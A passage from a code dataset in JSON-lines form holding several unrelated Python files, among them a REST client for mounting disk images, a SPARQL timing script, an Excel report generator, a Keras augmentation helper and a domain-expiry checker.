redirect(\"/\", code=302)\r\n\r\nif __name__ == \"__main__\": \r\n app.run(debug= True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"252835592","text":"# Copyright 2019 The MITRE CORPORATION\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\n\nimport requests\n\nfrom thumbtack_client import ThumbtackClientException\nfrom thumbtack_client.ThumbtackClientException import ThumbtackClientException\n\nlogger = logging.getLogger(__name__)\n\n\nclass ThumbtackClient(object):\n \"\"\"\n Creates the ThumbtackClient object using the `requests.Session class `_\n so that its 'delete', 'get', and 'put' methods can be used to send requests.\n \"\"\"\n def __init__(self, host='127.0.0.1', port=8208):\n \"\"\"\n Initializes the ThumbtackClient object with the `requests.Session class `_\n\n Parameters\n ----------\n host : str\n default host address is 127.0.0.1\n port: int\n default port is 8208\n \"\"\"\n self.session = requests.Session()\n self._host = '{}:{}'.format(host, port)\n\n def list_mounted_images(self):\n \"\"\"\n Returns\n -------\n dict\n A JSON serialized dictionary of all mounted images in: 'http://127.0.0.1:8208/mounts/'\n \"\"\"\n url = 'http://{}/mounts/'.format(self._host)\n response = self._get(url, expected_status=200)\n return response.json()\n\n def mount_image(self, image_path):\n \"\"\"\n Parameters\n ----------\n image_path : str\n file path of the image to be mounted\n\n Returns\n -------\n dict\n requests.Response object : the result of the request.response object with the 'put' method applied\n \"\"\"\n url = 'http://{}/mounts/{}'.format(self._host, image_path.lstrip('/'))\n response = self._put(url, expected_status=200)\n return response.json()\n\n def unmount_image(self, image_path):\n \"\"\"Deletes supplied image from list of mounted images\n\n Parameters\n ----------\n image_path : str\n file path of the image to be deleted\n\n Returns\n -------\n dict\n requests.Response object : the result of the request.response object with the 'delete' method applied\n \"\"\"\n url = 'http://{}/mounts/{}'.format(self._host, image_path.lstrip('/'))\n response = self._delete(url, expected_status=200)\n return response.json()\n\n def _put(self, url, expected_status=None, **kwargs):\n return self._do_method_checked('put', url, expected_status, **kwargs)\n\n def _get(self, url, expected_status=None, **kwargs):\n return self._do_method_checked('get', url, expected_status, **kwargs)\n\n def _delete(self, url, expected_status=None, **kwargs):\n return self._do_method_checked('delete', url, expected_status, **kwargs)\n\n def _do_method_checked(self, method, url, expected_status, **kwargs):\n \"\"\"This checks that the received response to the requested method was successful, otherwise\n raises exception and displays the status code received.\n\n Parameters\n ----------\n method : str\n 'put', 'get', or 'delete'\n url : str\n same url used to mount or unmount the image\n expected_status: int, list of int, or None\n HTTP response codes that are expected\n kwargs : optional\n optional arguments that `request `_ takes\n\n Returns\n -------\n requests.Response\n The value returned when the specified method is requested of the ThumbtackClient\n session\n \"\"\"\n response = None\n try:\n response = getattr(self.session, method)(url, **kwargs)\n except requests.ConnectionError as e:\n raise ThumbtackClientException(str(e))\n if expected_status is not None:\n if not hasattr(expected_status, '__iter__'):\n expected_status = [expected_status]\n\n if response.status_code not in expected_status:\n msg = 'Unexpected status {} from {} ({}); expected {}' \\\n .format(response.status_code, response.url, response.request.method, expected_status)\n if response.text:\n msg += ' - response text: {}'.format(response.text)\n raise ThumbtackClientException(msg)\n return response\n","sub_path":"src/thumbtack_client/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"128811969","text":"from time import time\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport sys\nfrom argparse import ArgumentParser\nimport json\nimport logging\n\n\n\n\n\n\nSPARQL_ENDPOINT=\"http://sparql-evs-dev.nci.nih.gov/sparql\"\nGRAPH=\"\"\nCODE=\"C4872\"\n\n\n\nSPARQL_USER = \"NA\"\nSPARQL_PASSWORD = \"NA\"\n\nprefix = '''\nPREFIX :\nPREFIX ncit:\nPREFIX base:\nPREFIX owl:\nPREFIX rdf:\nPREFIX rdfs:\nPREFIX xsd:\nprefix franzOption_logQuery: \n'''\n\n \n'''\n# run_sparql_query\n'''\n\ndef run_sparql_query(query):\n logging.basicConfig(level=logging.DEBUG)\n headers = {'Accept': 'application/sparql-results+json'}\n r = requests.post(SPARQL_ENDPOINT,\n headers=headers,data={ \"query\": query },\n auth=HTTPBasicAuth(SPARQL_USER,SPARQL_PASSWORD))\n print(r.status_code)\n if r.status_code != 200:\n sys.stderr.write(\"Problem Status Code: \" + str(r.status_code) + \"\\n\")\n sys.exit(1)\n \n return r.json()\n\n\ndef constructConceptLabelQuery(CODE,GRAPH):\n print(\"constructConceptLabelQuery\")\n QUERY='''SELECT ?conceptLabel\n { GRAPH $GRAPH\n { ?concept a owl:Class .\n ?concept :NHC0 \"$CODE\" .\n ?concept rdfs:label ?conceptLabel\n }\n }\n '''\n QUERY2 = QUERY.replace(\"$CODE\",CODE)\n query = QUERY2.replace(\"$GRAPH\",GRAPH)\n query = prefix + query\n print (query)\n obj = run_sparql_query(query)\n return obj['results']['bindings']\n\n \ndef constructConceptLabelQuery2(CODE,GRAPH):\n print(\"constructConceptLabelQuery\")\n QUERY='''SELECT ?conceptLabel\n { GRAPH $GRAPH\n { ncit:$CODE rdfs:label ?conceptLabel\n }\n }\n '''\n QUERY2 = QUERY.replace(\"$CODE\",CODE)\n query = QUERY2.replace(\"$GRAPH\",GRAPH)\n query = prefix + query\n print (query)\n obj = run_sparql_query(query)\n return obj['results']['bindings']\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n prog=\"checkEndpoint\",\n description=\"Do SPARQL timings.\")\n \n args = parser.parse_args()\n# GRAPH=\"\"\n# GRAPH=\"\"\n \n print(\"time queries from \" + SPARQL_ENDPOINT);\n print(\"==========================================================\")\n \n T0 = time()\n results = constructConceptLabelQuery(CODE,GRAPH)\n T1 = time()\n DIFF = (T1 - T0)\n print(DIFF)\n print(json.dumps(results,indent=2))\n \n print(\"==========================================================\")\n \n print(\"time queries from \" + SPARQL_ENDPOINT);\n print(\"==========================================================\")\n \n T0 = time()\n results = constructConceptLabelQuery2(CODE,GRAPH)\n T1 = time()\n DIFF = (T1 - T0)\n print(DIFF)\n print(json.dumps(results,indent=2))\n \n ","sub_path":"SPARQL_Test/src/testTiming_evsrestapi.py","file_name":"testTiming_evsrestapi.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"371913680","text":"# -*- coding: utf-8 -*\n#rid 57 STP\nimport xlsxwriter\nfrom io import BytesIO\nimport datetime\nfrom .. import stp_config\n\ndef form_url(params):\n\tbase_url = str(stp_config.CONST.API_URL_PREFIX) + 'stp_contract_summary/'\n\tbase_url += str(params[\"year\"])\n\treturn base_url\n\n\n#by municipality\ndef render(res, params):\n\n\trid = params[\"rid\"]\n\tyear = params[\"year\"]\n\tcon_num = params[\"con_num\"]\n\tassign_num = params[\"assign_num\"]\n\n\toutput = BytesIO()\n\tworkbook = xlsxwriter.Workbook(output, {'in_memory': True})\n\tworksheet = workbook.add_worksheet()\n\tdata = res\n\ttitle = 'Summary of Contract Items, Grouped by Municipality'\n\ttitle2 = 'Top Performers, Grouped by Municipality'\n\n\t#MAIN DATA FORMATING\n\tformat_text = workbook.add_format(stp_config.CONST.FORMAT_TEXT)\n\tformat_num = workbook.add_format(stp_config.CONST.FORMAT_NUM)\n\titem_header_format = workbook.add_format(stp_config.CONST.ITEM_HEADER_FORMAT)\t\t\n\tsubtitle_format = workbook.add_format(stp_config.CONST.SUBTITLE_FORMAT)\n\n\t#set column width\n\tworksheet.set_column('A:A', 12.56)\n\tworksheet.set_column('B:B', 47.78)\n\tworksheet.set_column('C:C', 14.11)\n\tworksheet.set_column('D:D', 15.78)\n\tworksheet.set_column('E:E', 33.89)\n\tworksheet.set_column('F:F', 8.99)\n\t#worksheet.set_column('G:G', 11.33)\n\t#worksheet.set_column('H:H', 11.89)\n\t#worksheet.set_column('I:I', 11)\n\t#worksheet.set_column('J:J', 9.65)\n\n\t#set row\n\tworksheet.set_row(0,36)\n\tworksheet.set_row(1,36)\n\tworksheet.set_row(5,23.4)\n\t#worksheet.set_row(6, 31.2)\n\n\t#HEADER\n\t#write general header and format\n\trightmost_idx = 'F'\n\tstp_config.const.write_gen_title(title, workbook, worksheet, rightmost_idx, year, con_num)\n\n\t#additional header image\n\tworksheet.insert_image('E1', stp_config.CONST.ENV_LOGO,{'x_offset':70,'y_offset':22, 'x_scale':0.5,'y_scale':0.5, 'positioning':2})\n\n\t#MAIN DATA\n\t##Making dict with key as group by id and distinct contract item num as value\n\tforesters = {}\n\n\t\n\tfor afid, forester in enumerate(data[\"items\"]):\n\t\tif not data[\"items\"][afid][\"municipality\"] in foresters.keys():\n\t\t\t# add mun as key\n\t\t\tforesters[data[\"items\"][afid][\"municipality\"]] = []\n\t\t\t# append contract item num to []\n\t\t\tif data[\"items\"][afid][\"contract_item_num\"] not in foresters[data[\"items\"][afid][\"municipality\"]]:\n\t\t\t\tforesters[data[\"items\"][afid][\"municipality\"]].append(data[\"items\"][afid][\"contract_item_num\"])\n\t\telif data[\"items\"][afid][\"municipality\"] in foresters.keys():\n\t\t\t# append contract item num to []\n\t\t\tif data[\"items\"][afid][\"contract_item_num\"] not in foresters[data[\"items\"][afid][\"municipality\"]]:\n\t\t\t\tforesters[data[\"items\"][afid][\"municipality\"]].append(data[\"items\"][afid][\"contract_item_num\"])\n\n\n\t# writing main data\n\tcr = 7 #current row, starting at offset where data begins\n\titem_fields = ['Contract Item No.', 'Location', 'RINs', 'Status', 'Item', 'Quantity']\n\t#loop over all programs\n\tfor afid, forester in enumerate(foresters.keys()):\n\t\tworksheet.merge_range('A' + str(cr) + ':F' + str(cr), str('Municipality: ' + forester), subtitle_format) #was format_text\n\t\tworksheet.write_row('A' + str(cr+1), item_fields, item_header_format)\n\t\tcr += 2\n\n\t\tfor cid, contract_item in enumerate(foresters[forester]):\n\t\t\tmerge_top_idx = cr\n\t\t\tlocation = ''\n\t\t\trins = ''\n\t\t\tdescription = ''\n\n\t\t\tfor idx, val in enumerate(data[\"items\"]):\n\t\t\t\tif data[\"items\"][idx][\"municipality\"] == forester and data[\"items\"][idx][\"contract_item_num\"] == contract_item:\n\n\t\t\t\t\ta1 = data[\"items\"][idx][\"contract_item_num\"] if \"contract_item_num\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('A' + str(cr), a1 if a1 is not None else \"\", format_text)\n\n\t\t\t\t\ta2 = data[\"items\"][idx][\"location\"] if \"location\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('B' + str(cr), a2 if a2 is not None else \"\", format_text)\n\t\t\t\t\t\n\t\t\t\t\ta3 = data[\"items\"][idx][\"rins\"] if \"rins\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('C' + str(cr), a3 if a3 is not None else \"\", format_text)\n\t\t\t\t\t\n\t\t\t\t\ta4 = data[\"items\"][idx][\"description\"] if \"description\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('D' + str(cr), a4 if a4 is not None else \"\", format_text)\n\t\t\t\t\t\n\t\t\t\t\ta5 = data[\"items\"][idx][\"item\"] if \"item\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('E' + str(cr), a5 if a5 is not None else \"\", format_text)\n\t\t\t\t\t\n\t\t\t\t\ta6 = data[\"items\"][idx][\"quantity\"] if \"quantity\" in data[\"items\"][idx].keys() else \"\"\n\t\t\t\t\tworksheet.write('F' + str(cr), a6 if a6 is not None else \"\", format_num)\n\t\t\t\t\t\n\t\t\t\t\tcr += 1\n\t\t\t\t\tmerge_bottom_idx = cr - 1\n\t\t\t\t\tlocation = a2\n\t\t\t\t\trins = a3\n\t\t\t\t\tdescription = a4\n\n\n\t\t\tworksheet.merge_range('A'+ str(merge_top_idx) + ':A' + str(merge_bottom_idx) , contract_item, format_text)\n\t\t\tworksheet.merge_range('B'+ str(merge_top_idx) + ':B' + str(merge_bottom_idx) , location, format_text)\n\t\t\tworksheet.merge_range('C'+ str(merge_top_idx) + ':C' + str(merge_bottom_idx) , rins, format_text)\n\t\t\tworksheet.merge_range('D'+ str(merge_top_idx) + ':D' + str(merge_bottom_idx) , description, format_text)\n\t\t\tworksheet.set_row(cr,stp_config.CONST.BREAKDOWN_INBETWEEN_HEIGHT)\n\t\t\t\n\n\t\tcr += 1\n\n\t#Group by contract item number\n\tcontract_items = []\n\ttp = {} # tp = top performers\n\n\tfor iid, item in enumerate(data[\"items\"]):\n\t\tif not data[\"items\"][iid][\"contract_item_num\"] in contract_items:\n\t\t\tcontract_items.append(data[\"items\"][iid][\"contract_item_num\"])\n\t\n\t#calculate number and overall\n\ttp[\"Overall\"] = {\"top_p_qty\": 0, \"non_top_p_qty\" : 0, \"total_qty\" : 0}\n\n\tfor cid, item in enumerate(data[\"items\"]):\n\t\t# first time having the key\n\t\tif not data[\"items\"][cid][\"contract_item_num\"] in tp.keys(): \n\t\t\tif data[\"items\"][cid][\"top_performer\"] == 'Y':\n\t\t\t\t#for different reports, change contract_item_num to other group by ids\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]] = {\"top_p_qty\": data[\"items\"][cid][\"quantity\"], \"non_top_p_qty\" : 0, \"total_qty\" : data[\"items\"][cid][\"quantity\"]}\n\t\t\t\ttp[\"Overall\"][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\telif data[\"items\"][cid][\"top_performer\"] == 'N':\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]] = {\"top_p_qty\": 0, \"non_top_p_qty\" : data[\"items\"][cid][\"quantity\"], \"total_qty\" : data[\"items\"][cid][\"quantity\"]}\n\t\t\t\ttp[\"Overall\"][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t\t# second time having the key\n\t\telif data[\"items\"][cid][\"contract_item_num\"] in tp.keys():\n\t\t\tif data[\"items\"][cid][\"top_performer\"] == 'Y':\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t\t\telif data[\"items\"][cid][\"top_performer\"] == 'N':\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[data[\"items\"][cid][\"contract_item_num\"]][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\n\t##============TOP PERFORMAERS SUB TABLE=============\n\t#TOP PERFORMERS COLUMN NAMES\n\titem_fields = ['Municipality', 'Top Performer', 'Top Performer %', 'Non Top Performer', 'Non Top Performer %', 'Total']\n\n\t\n\t#TOP PERFORMER CALCULATION\n\tcontract_items = []\n\ttp = {} # tp = top performers\n\n\tfor iid, item in enumerate(data[\"items\"]):\n\t\tif not data[\"items\"][iid][\"municipality\"] in contract_items:\n\t\t\tcontract_items.append(data[\"items\"][iid][\"municipality\"])\n\t\n\t#calculate number and overall\n\ttp[\"Overall\"] = {\"top_p_qty\": 0, \"non_top_p_qty\" : 0, \"total_qty\" : 0}\n\n\tfor cid, item in enumerate(data[\"items\"]):\n\t\t# first time having the key\n\t\tif not data[\"items\"][cid][\"municipality\"] in tp.keys(): \n\t\t\tif data[\"items\"][cid][\"top_performer\"] == 'Y':\n\t\t\t\t#for different reports, change contract_item_num to other group by ids\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]] = {\"top_p_qty\": data[\"items\"][cid][\"quantity\"], \"non_top_p_qty\" : 0, \"total_qty\" : data[\"items\"][cid][\"quantity\"]}\n\t\t\t\ttp[\"Overall\"][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\telif data[\"items\"][cid][\"top_performer\"] == 'N':\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]] = {\"top_p_qty\": 0, \"non_top_p_qty\" : data[\"items\"][cid][\"quantity\"], \"total_qty\" : data[\"items\"][cid][\"quantity\"]}\n\t\t\t\ttp[\"Overall\"][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t\t# second time having the key\n\t\telif data[\"items\"][cid][\"municipality\"] in tp.keys():\n\t\t\tif data[\"items\"][cid][\"top_performer\"] == 'Y':\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t\t\telif data[\"items\"][cid][\"top_performer\"] == 'N':\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[data[\"items\"][cid][\"municipality\"]][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"non_top_p_qty\"] += data[\"items\"][cid][\"quantity\"]\n\t\t\t\ttp[\"Overall\"][\"total_qty\"] += data[\"items\"][cid][\"quantity\"]\n\n\t#calculate percentage and write top performers into table\n\tpercent_fmt = workbook.add_format({'num_format': '0.00%','border':True,'border_color':'gray',})\n\trowcount = 0\n\t#cr -= 1 # overall is the first row\n\n\tif tp[\"Overall\"][\"total_qty\"] > 0:\n\t\tworksheet.write_row( \"A\" + str(cr), item_fields, item_header_format)\n\t\t#cr += 1\n\n\t\tfor idx, cnum in enumerate(tp):\n\t\t\tif cnum != \"Overall\":\n\t\t\t\tworksheet.write(\"A\" + str(idx + cr), cnum, format_text)\n\t\t\t\tworksheet.write(\"B\" + str(idx + cr), tp[cnum][\"top_p_qty\"], format_num)\n\t\t\t\tworksheet.write(\"C\" + str(idx + cr), tp[cnum][\"top_p_qty\"]/tp[cnum][\"total_qty\"], percent_fmt)\n\t\t\t\tworksheet.write(\"D\" + str(idx + cr), tp[cnum][\"non_top_p_qty\"], format_num)\n\t\t\t\tworksheet.write(\"E\" + str(idx + cr), tp[cnum][\"non_top_p_qty\"]/tp[cnum][\"total_qty\"], percent_fmt)\n\t\t\t\tworksheet.write(\"F\" + str(idx + cr), tp[cnum][\"total_qty\"], format_num)\n\n\t\t\t\trowcount = idx\n\n\t\tcr += 1 # overall was the first row\n\t\t#write overall data\n\t\tworksheet.write(\"A\" + str(rowcount + cr), \"Overall\", format_text)\n\t\tworksheet.write(\"B\" + str(rowcount + cr), tp[\"Overall\"][\"top_p_qty\"], format_num)\n\t\tworksheet.write(\"C\" + str(rowcount + cr), tp[\"Overall\"][\"top_p_qty\"]/tp[\"Overall\"][\"total_qty\"], percent_fmt)\n\t\tworksheet.write(\"D\" + str(rowcount + cr), tp[\"Overall\"][\"non_top_p_qty\"], format_num)\n\t\tworksheet.write(\"E\" + str(rowcount + cr), tp[\"Overall\"][\"non_top_p_qty\"]/tp[\"Overall\"][\"total_qty\"], percent_fmt)\n\t\tworksheet.write(\"F\" + str(rowcount + cr), tp[\"Overall\"][\"total_qty\"], format_num)\n\t\n\t#====ending=======\n\n\n\n\tworkbook.close()\n\t\n\txlsx_data = output.getvalue()\n\treturn xlsx_data","sub_path":"stp/report_classes/stp_cis_m.py","file_name":"stp_cis_m.py","file_ext":"py","file_size_in_byte":11047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"546646875","text":"import numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import np_utils\n\ndef keras_image_generator():\n datagen = ImageDataGenerator(\n # 在整个数据集上将输入均值置为 0\n featurewise_center=False,\n # 将每个样本均值置为 0\n samplewise_center=False,\n # 将输入除以整个数据集的 std\n featurewise_std_normalization=False,\n # 将每个输入除以其自身 std\n samplewise_std_normalization=False,\n # 应用 ZCA 白化\n zca_whitening=False,\n # ZCA 白化的 epsilon 值\n zca_epsilon=1e-06,\n # 随机图像旋转角度范围 (deg 0 to 180)\n rotation_range=30,\n # 随机水平平移图像\n width_shift_range=0.1,\n # 随机垂直平移图像\n height_shift_range=0.1,\n # 设置随机裁剪范围\n shear_range=0.,\n # 设置随机缩放范围\n zoom_range=0.,\n # 设置随机通道切换范围\n channel_shift_range=0.,\n # 设置输入边界之外的点的数据填充模式\n fill_mode='nearest',\n # 在 fill_mode = \"constant\" 时使用的值\n cval=0.,\n # 随机翻转图像\n horizontal_flip=True,\n # 随机翻转图像\n vertical_flip=False)\n return datagen\n\ndef image_generator_2Dto3D(data, label, datagen, class_num, batch_size = 8, shuffle=True): #Input dim (n,64,64,64)\n datagen.fit(data)\n for data_batch, label_batch in datagen.flow(data, label, batch_size=batch_size, shuffle = shuffle):\n yield(np.expand_dims(data_batch, axis=-1), np_utils.to_categorical(label_batch, class_num))\n\n\n","sub_path":"mapper/keras_generator.py","file_name":"keras_generator.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"353690550","text":"import csv\nfrom sys import platform\nfrom date import Date\n\nf = open(\"csv/questionnaires/quest_mdv_temps.csv\",\"r\")\ndates_diag = []\nr = csv.reader(f, delimiter=\";\")\nnext(f)\n\nfor ligne in r:\n datediag=Date(ligne[-1])\n if Date(\"2015-01-01\")>datediag:\n if Date(\"2009-01-01\")<=datediag:\n dates_diag.append((-Date(\"2009-01-01\").delta(datediag),ligne[0]))\n dates_diag.append((Date(\"2009-01-01\").delta(datediag),ligne[0]))\nf.close()\n\ndates_diag.sort()\nn_max=dates_diag[-1][0]\nn_max+=72\n\nClusters_avant_diag = {1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0, 10:0, 11:0}\n\ndef remplir(tab,deb_seq,n_max,clusters):\n tab.append([])\n for k in range(24 + deb_seq//3):\n tab[-1].append(0)\n for i in range(0, -min(deb_seq//3,24)):\n# Clusters_avant_diag[int(clusters[i])] += 1\n tab[-1].append(clusters[i])\n for i in range(-min(deb_seq//3,0),len(clusters)):\n tab[-1].append(clusters[i])\n while len(tab[-1])= self.thau_zero_threshold),\n ['thau','lot']].reset_index(drop=True)\n hedge_client_kde = kde.KDE1D(hedge_client['thau'], covariance=kde.silverman_covariance,\n weights=hedge_client['lot'],\n lower=self.thau_zero_threshold, method=kde_methods.linear_combination,\n kernel=kernels.Epanechnikov())\n hedge_client_pdf = hedge_client_kde.pdf(self.greater_zero_thau_grid)\n hedge_client_pdf[hedge_client_pdf<0.0] = 0.0\n hedge_dealer = self.hedging_data.loc[(self.hedging_data['is_dealer'] == True) &\n (self.hedging_data['thau'] >= self.thau_zero_threshold),\n ['thau','lot']].reset_index(drop=True)\n hedge_dealer_kde = kde.KDE1D(hedge_dealer['thau'], covariance=kde.silverman_covariance,\n weights=hedge_dealer['lot'],\n lower=self.thau_zero_threshold, method=kde_methods.linear_combination,\n kernel=kernels.Epanechnikov())\n hedge_dealer_pdf = hedge_dealer_kde.pdf(self.greater_zero_thau_grid)\n hedge_dealer_pdf[hedge_dealer_pdf<0.0] = 0.0\n return hedge_client_pdf, hedge_dealer_pdf\n\n def load_hedging_deals_data_and_deals_ids(self):\n deals = self.deals_dao.get_clients_subset_deals_aggr_ids(self.start_date, self.end_date, self.instruments,\n self.lot_range, self.tenors, self.hours_range, self.minutes_range,\n self.including_rejects, self.account, self.client_name, self.pk)\n self.aggr_ids = deals['aggr_id'].tolist()\n self.mean_lot = deals['lot'].mean()\n params = {'aggr_ids': tuple(self.aggr_ids), 'thau_end': self.thau_density_endpoint}\n query = \"SELECT dealer, lot, thau FROM pk_hedge_deals where aggr_id in :aggr_ids and thau<=:thau_end;\"\n self.vertica_cursor.execute(query, params)\n self.hedging_data = pd.DataFrame(self.vertica_cursor.fetchall(), columns=['is_dealer', 'lot', 'thau'])\n\n def get_subspace_point_probabilites(self, hedging_data):\n # Estimate probability as proportion of all hedging deals\n total_vol = hedging_data['lot'].sum()\n zero_thau_vol_client = hedging_data.loc[\n (hedging_data['is_dealer'] == False) & (hedging_data['thau'] < self.thau_zero_threshold), 'lot'].sum()\n zero_thau_vol_dealer = hedging_data.loc[\n (hedging_data['is_dealer'] == True) & (hedging_data['thau'] < self.thau_zero_threshold), 'lot'].sum()\n greater_zero_thau_vol_client = hedging_data.loc[\n (hedging_data['is_dealer'] == False) & (hedging_data['thau'] >= self.thau_zero_threshold), 'lot'].sum()\n greater_zero_thau_vol_dealer = hedging_data.loc[\n (hedging_data['is_dealer'] == True) & (hedging_data['thau'] >= self.thau_zero_threshold), 'lot'].sum()\n return zero_thau_vol_client / total_vol, zero_thau_vol_dealer / total_vol, \\\n greater_zero_thau_vol_client / total_vol, greater_zero_thau_vol_dealer / total_vol\n\n def get_expected_pnl_data(self):\n self.prepare_interpolated_price_decay()\n zero_thau_pnl_client = self.price_decay.at[0.0, 'mean']\n if self.adjust_dealer == True:\n dealer_correction = self.get_dealer_price_correction(zero_thau_pnl_client)\n self.price_decay.loc[:, 'dealer_mean'] = self.price_decay.loc[:, 'mean'] - self.price_decay.loc[:, 'half_spread'] + dealer_correction\n else:\n self.price_decay.loc[:, 'dealer_mean'] = self.price_decay.loc[:, 'mean'] - self.price_decay.loc[:, 'half_spread']\n zero_thau_pnl_dealer = self.price_decay.at[0.0, 'dealer_mean']\n greater_zero_thau_pnl_client = self.price_decay.loc[self.price_decay.index >= self.thau_zero_threshold, 'mean']\n greater_zero_thau_pnl_dealer = self.price_decay.loc[self.price_decay.index >= self.thau_zero_threshold, 'dealer_mean']\n self.greater_zero_thau_grid = greater_zero_thau_pnl_client.index.values\n return zero_thau_pnl_client, zero_thau_pnl_dealer, greater_zero_thau_pnl_client, greater_zero_thau_pnl_dealer\n\n def get_dealer_price_correction(self, zero_thau_pnl_client):\n X = pd.DataFrame()\n X['db_target'] = (zero_thau_pnl_client - self.price_decay.loc[:, 'half_spread']) / self.sample_price\n X['half_spread'] = self.price_decay['half_spread'] / self.sample_price\n # X['lot_usd'] = self.mean_lot\n correction = self.dealer_price_model.predict(X.values)\n return correction*self.sample_price\n\n def prepare_interpolated_price_decay(self):\n self.equal_spaced_index = np.linspace(0.0, 3000.0, 3001)\n self.price_decay = self.price_decay.loc[self.price_decay.index >= 0.0]\n ts = pd.Series(index=self.equal_spaced_index)\n prepared_series = pd.concat([self.price_decay, ts]).sort_index().loc[:, ['mean', 'half_spread']].astype(float)\n interpolated = prepared_series.interpolate('index').loc[ts.index]\n interpolated = interpolated.loc[~interpolated.index.duplicated()]\n self.price_decay = interpolated\n\n def get_current_sample_price(self, instrument):\n # Sample price\n today = datetime.today()\n params = {'start': today - timedelta(days=30), 'end': today, 'instrument': instrument}\n query = \"SELECT price from prep_nonaggr where set_time>=:start and set_time<=:end and instr_name = :instrument ORDER BY set_time DESC LIMIT 1;\"\n self.vertica_cursor.execute(query, params)\n sample_price = self.vertica_cursor.fetchone()[0]\n return sample_price\n\n def get_density_data(self):\n return self.client_density, self.dealer_density\n\n def get_proba_data(self):\n return self.p_equal0_client, self.p_greater0_client, self.p_equal0_dealer, self.p_greater0_dealer\n\n def get_deal_ids(self):\n return self.aggr_ids\n\n\n\n","sub_path":"ClientAnalysis/ClientsPkPnlEstimation.py","file_name":"ClientsPkPnlEstimation.py","file_ext":"py","file_size_in_byte":10470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"242831452","text":"import argparse\nimport datetime\nimport requests\nfrom whois import whois\n\n\ndef load_urls4check(path):\n with open(path, 'r') as f:\n return [line.rstrip('\\n') for line in f.readlines()]\n\ndef is_server_respond_with_200(url):\n url = fix_url(url)\n try:\n response = requests.head(url)\n except requests.ConnectionError:\n return False\n return response.status_code == 200\n\ndef get_domain_expiration_date(domain_name):\n w = whois(domain_name)\n expiration_date = w.expiration_date\n if type(expiration_date) == list:\n return expiration_date[0]\n return expiration_date\n\ndef fix_url(url):\n if not url.startswith('http://') and not url.startswith('https://'):\n return 'http://{0}'.format(url)\n return url\n\ndef is_paid_more_then_month(expiration_date):\n if not expiration_date:\n return\n month_forward = datetime.datetime.now() - datetime.timedelta(days=30)\n return expiration_date >= month_forward\n\ndef pretty_print_check(url, expiration_date, status, need_extend):\n 